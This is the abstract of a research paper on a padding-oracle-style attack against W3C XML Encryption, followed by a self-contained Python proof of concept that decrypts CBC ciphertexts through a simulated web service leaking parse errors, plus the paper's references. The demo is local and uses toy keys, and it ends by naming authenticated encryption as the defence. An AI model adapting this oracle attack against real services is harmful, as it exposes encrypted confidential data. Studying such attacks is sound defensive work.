How to break XML encryption

XML Encryption was standardized by the W3C in 2002 and is implemented in the XML frameworks of major commercial and open-source organizations such as Apache, Red Hat, IBM, and Microsoft. It is employed in a large number of major web-based applications, ranging from business communications, e-commerce, and financial services through healthcare applications to governmental and military infrastructures. In this work we describe a practical attack on XML Encryption which allows an adversary to decrypt a ciphertext by sending related ciphertexts to a Web Service and evaluating the server's response. We show that an adversary can decrypt a ciphertext by performing only 14 requests per plaintext byte on average. This poses a serious and truly practical security threat to all currently used implementations of XML Encryption. In a sense the attack can be seen as a generalization of padding oracle attacks (Vaudenay, Eurocrypt 2002). It exploits a subtle correlation between the block cipher mode of operation, the character encoding of the encrypted text, and the response behaviour of a Web Service when an XML message cannot be parsed correctly.
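The attack sketched in the abstract, as an added example that is not part of the paper: a Web Service that CBC-decrypts a ciphertext, strips XML Encryption padding, decodes the result as UTF-8 and parses it as XML answers every request only with success or failure, and an attacker who can submit single-block ciphertexts under a chosen IV turns that one bit into a decryption oracle. The service, the toy Feistel block cipher that stands in for AES (the attack never touches the cipher, only the malleability of CBC), the sample payload and the key are all constructed for this example. The byte-recovery procedure is a simplified one chosen for readability, not the paper's optimized algorithm, so its request count per byte is higher than the 14 reported in the abstract; it also assumes that the service reports an out-of-range padding length as a failure like any other parse error.

```python
import hashlib
import hmac
import xml.etree.ElementTree as ET

BLOCK = 16

def xor(a, b):
    return bytes(p ^ q for p, q in zip(a, b))

# Toy 4-round Feistel cipher (HMAC-SHA256 rounds) in place of AES; the attack is cipher-agnostic.
def _f(key, rnd, half):
    return hmac.new(key, bytes([rnd]) + half, hashlib.sha256).digest()[:8]
def block_encrypt(key, block):
    l, r = block[:8], block[8:]
    for rnd in range(4):
        l, r = r, xor(l, _f(key, rnd, r))
    return l + r
def block_decrypt(key, block):
    l, r = block[:8], block[8:]
    for rnd in reversed(range(4)):
        l, r = xor(r, _f(key, rnd, l)), l
    return l + r
def cbc_encrypt(key, iv, padded):
    out, prev = [], iv
    for k in range(0, len(padded), BLOCK):
        prev = block_encrypt(key, xor(padded[k:k + BLOCK], prev))
        out.append(prev)
    return b"".join(out)
def cbc_decrypt(key, iv, ct):
    blocks = [ct[k:k + BLOCK] for k in range(0, len(ct), BLOCK)]
    return b"".join(xor(block_decrypt(key, c), p) for p, c in zip([iv] + blocks, blocks))

# XML Encryption padding: last byte = number of padding bytes (1..16); filler bytes are not checked.
def pad(data):
    n = BLOCK - len(data) % BLOCK
    return data + bytes(n - 1) + bytes([n])
def unpad(padded):
    n = padded[-1]
    if not 1 <= n <= BLOCK:
        raise ValueError("invalid padding length")
    return padded[:-n]
# The leak: decrypted content must be UTF-8 and must parse once it is back in the document.
def xml_text_ok(raw):
    try:
        ET.fromstring("<a>" + raw.decode("utf-8") + "</a>")
        return True
    except (UnicodeDecodeError, ET.ParseError):
        return False
# Web Service that reveals only success or failure of decrypt-and-parse (assumption: a
# padding length outside 1..16 is reported as a failure as well).
def make_service(key):
    def oracle(iv, ct):
        oracle.requests += 1
        try:
            return xml_text_ok(unpad(cbc_decrypt(key, iv, ct)))
        except ValueError:
            return False
    oracle.requests = 0
    return oracle

# ---- attacker: knows only (iv, ct) and the service's public decoding rules ----
def find_last_byte(oracle, block):
    """Find X[15] of X = Dec(block): with IV byte v such that P'[15] = 16 the whole block is padding,
    so all four high-bit variants of bytes 0/1 parse; with any shorter padding one is invalid UTF-8."""
    for v in range(256):
        base = bytes(15) + bytes([v])
        masks = (bytes([m0, m1]) + bytes(14) for m0 in (0, 0x80) for m1 in (0, 0x80))
        if all(oracle(xor(base, m), block) for m in masks):
            return v ^ 16
    raise RuntimeError("service does not behave as modelled")
def recover_byte(oracle, block, iv_base, i, valid):
    """Ask whether X[i] ^ t is a valid one-byte XML character, choosing t to split the candidates evenly."""
    cands = set(range(256))
    while len(cands) > 1:
        t = min(range(256), key=lambda t: abs(2 * sum((x ^ t) in valid for x in cands) - len(cands)))
        answer = oracle(iv_base[:i] + bytes([t]) + iv_base[i + 1:], block)
        cands = {x for x in cands if ((x ^ t) in valid) == answer}
    return cands.pop()
def recover_block(oracle, block):
    x = bytearray(BLOCK)
    x[15] = find_last_byte(oracle, block)
    valid = frozenset(b for b in range(256) if xml_text_ok(bytes([b])))
    for i in range(15):   # known bytes 0..i-1 decrypt to 'a'; padding length 15-i leaves 0..i as data
        iv = xor(x[:i], b"a" * i) + bytes(15 - i) + bytes([x[15] ^ (15 - i)])
        x[i] = recover_byte(oracle, block, iv, i, valid)
    return bytes(x)
def attack(oracle, iv, ct):
    """P_k = Dec(C_k) ^ C_(k-1): recover each block's decryption and XOR with its predecessor."""
    blocks = [ct[k:k + BLOCK] for k in range(0, len(ct), BLOCK)]
    return unpad(b"".join(xor(recover_block(oracle, c), p) for p, c in zip([iv] + blocks, blocks)))

PLAINTEXT = b"<Card>4111111111111111</Card>"   # constructed sample content
def run_demo():
    key, iv = hashlib.sha256(b"constructed demo key").digest(), bytes(range(BLOCK))
    oracle = make_service(key)
    recovered = attack(oracle, iv, cbc_encrypt(key, iv, pad(PLAINTEXT)))
    return recovered, oracle.requests

if __name__ == "__main__":
    print(run_demo())
```

`run_demo()` returns the recovered plaintext together with the number of requests the service answered. The only information the attacker ever uses is whether the decrypted content could be decoded and parsed; a service that authenticates the ciphertext before decrypting it (the authenticated-encryption remedy argued for in [4]) and otherwise returns one uniform error leaves nothing to measure.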

[1] C. M. Sperberg-McQueen et al. Extensible Markup Language (XML), 1997, World Wide Web Journal.

[2] Thuan L. Thai et al. .NET Framework Essentials, 2001.

[3] Donald E. Eastlake et al. XML-Signature Syntax and Processing, 2001, RFC.

[4] John Black et al. Side-Channel Attacks on Symmetric Encryption Schemes: The Case for Authenticated Encryption, 2002, USENIX Security Symposium.

[5] Serge Vaudenay. Security Flaws Induced by CBC Padding: Applications to SSL, IPSEC, WTLS..., 2002, EUROCRYPT.

[6] Jean-Jacques Moreau et al. SOAP Version 1.2 Part 1: Messaging Framework, 2003.

[7] Mark O'Neill et al. Web Services Security, 2003.

[8] D. Eastlake et al. XML Encryption Syntax and Processing, 2003.

[9] Phillip Hallam-Baker et al. Web Services Security: SOAP Message Security, 2003.

[10] Kenneth G. Paterson et al. Padding Oracle Attacks on the ISO CBC Mode Encryption Standard, 2004, CT-RSA.

[11] Chris J. Mitchell. Error Oracle Attacks on CBC Mode: Is There a Future for CBC Mode Encryption?, 2005, ISC.

[12] Kenneth G. Paterson et al. Padding Oracle Attacks on CBC-Mode Encryption with Secret and Random IVs, 2005, FSE.

[13] Michael McIntosh et al. XML Signature Element Wrapping Attacks and Countermeasures, 2005, SWS '05.

[14] Kenneth G. Paterson et al. Attacking the IPsec Standards in Encryption-only Configurations, 2007, IEEE Symposium on Security and Privacy (SP '07).

[15] Kenneth G. Paterson et al. Immunising CBC Mode Against Padding Oracle Attacks: A Formal Security Treatment, 2008, SCN.

[16] Kenneth G. Paterson et al. On the (In)Security of IPsec in MAC-then-Encrypt Configurations, 2010, CCS '10.

[17] Thai Duong et al. Practical Padding Oracle Attacks, 2010, WOOT.

[18] Thai Duong et al. Cryptography in the Web: The Case of Cryptographic Design Flaws in ASP.NET, 2011, IEEE Symposium on Security and Privacy.